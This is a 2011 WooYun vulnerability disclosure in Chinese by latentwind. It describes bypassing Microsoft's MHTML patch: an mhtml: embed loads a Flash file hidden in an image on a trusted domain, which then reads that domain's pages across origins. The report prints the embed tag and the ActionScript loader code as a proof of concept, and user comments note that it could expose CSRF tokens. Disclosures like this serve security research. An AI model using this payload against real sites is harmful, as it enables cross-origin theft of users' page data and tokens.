当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2011-01929

漏洞标题:微软补丁后的MHTML“跨域”漏洞可以利用

相关厂商:微软

漏洞作者: latentwind

提交时间:2011-04-18 22:36

修复时间:2011-04-18 22:46

公开时间:2011-04-18 22:46

漏洞类型:设计错误/逻辑缺陷

危害等级:中

自评Rank:6

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2011-04-18: 积极联系厂商并且等待厂商认领中,细节不对外公开
2011-04-18: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

利用第三方插件如flash,仍然可以跨域读数据。个人认为主因还是在于微软,微软mhtml补丁不给力?

详细说明:

假设攻击者可控的网站为evildomain.com,用户存储数据的网站为trusteddomain.com

http://evildomain.com/flash.html,其HTML代码如下:

<embed type="application/x-shockwave-flash" src="mhtml:http://trusteddomain.com/wooyun.jpg!wooyun.swf" allowNetworking=all AllowScriptAccess=samedomain width=500 height=500></embed>


攻击者可控的wooyun.jpg里附加了flash,其as代码大致如下:
var url:String ="http://trusteddomain.com/flash.html";
if(url!=null){
mainText.border = true;
var loader = new URLLoader();
var req = new URLRequest(url);
loader.dataFormat = URLLoaderDataFormat.BINARY;
loader.addEventListener(Event.COMPLETE,getContent);
loader.load(req);
function getContent(event:Event):void
{
var bt:ByteArray = loader.data;
var restext:String = bt.readMultiByte(bt.length,"gb2312");
mainText.text = restext;
}
}
PS:这里为了测试方面,trusteddomain.com和evildomain.com指向同一个网站

漏洞证明:

访问后效果如下:


可见我们可控的flash,读取了http://trusteddomain.com/flash.html的内容。
同样的,攻击者也可以利用该漏洞“绕过”samedomain的限制,就不再列出。
相关请参考http://hi.baidu.com/d4rkwind/blog/item/e01bb6edbeef2320adafd5d2.html

修复方案:

。。。

版权声明:转载请注明来源 latentwind@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)

漏洞评价:

评论

  1. 2011-09-24 22:46 | 白细胞 ( 路人 | Rank:17 漏洞数:6 )

    这么好的思路,竟然没人顶。

  2. 2012-03-23 10:38 | g.r0b1n ( 路人 | Rank:17 漏洞数:5 | FreeBufer)

    这让我想起Google的那个xss,的确!想象力很关键 :)

  3. 2012-04-06 10:07 | tpu01yzx ( 实习白帽子 | Rank:58 漏洞数:8 | test)

    这个也算漏洞?没看出来,跟直接<iframe>添加一个外部网站的页面有什么本质的区别吗?求解释。

  4. 2012-04-06 10:08 | tpu01yzx ( 实习白帽子 | Rank:58 漏洞数:8 | test)

    好吧,我后知后觉了。

  5. 2012-04-13 01:56 | gainover 认证白帽子 ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

    白天来了解-下子。很不错。

  6. 2012-07-19 15:34 | zhq445078388 ( 实习白帽子 | Rank:60 漏洞数:19 | 请牢记"杀进程点康姆")

    @tpu01yzx FLASH的话 可能导致论坛等地方允许用户上传flash的地方而iframe插框架 至少也得获取一个js的权限 难度较大

  7. 2012-08-11 08:15 | 大和尚 ( 实习白帽子 | Rank:49 漏洞数:5 | www.ieroot.com 积极向上的心态!百折不挠...)

    没有联系到厂商或者积极拒绝是不是意味着,这漏洞还存在着...

  8. 2012-08-11 12:03 | gainover 认证白帽子 ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

    @tpu01yzx 区别在于,这个可以跨域获取目标域的网页内容,而网页内容里可能有一些有用的信息(比如一些防csrf的token信息), 而iframe只能嵌入目标域的网页,但是无法获取网页的源码内容。

  9. 2013-05-07 19:33 | 爱梅小礼 ( 实习白帽子 | Rank:93 漏洞数:16 | 我怀念的是无话不说)

    这个一定要顶,MS你有本事永远别补

  10. 2013-07-23 20:55 | ╰╃清風 ( 实习白帽子 | Rank:89 漏洞数:9 | 这家伙很懒,什么都没有留下)

    好东西

  11. 2013-07-24 11:04 | 爱梅小礼 ( 实习白帽子 | Rank:93 漏洞数:16 | 我怀念的是无话不说)

    @╰╃清風 鸡肋而已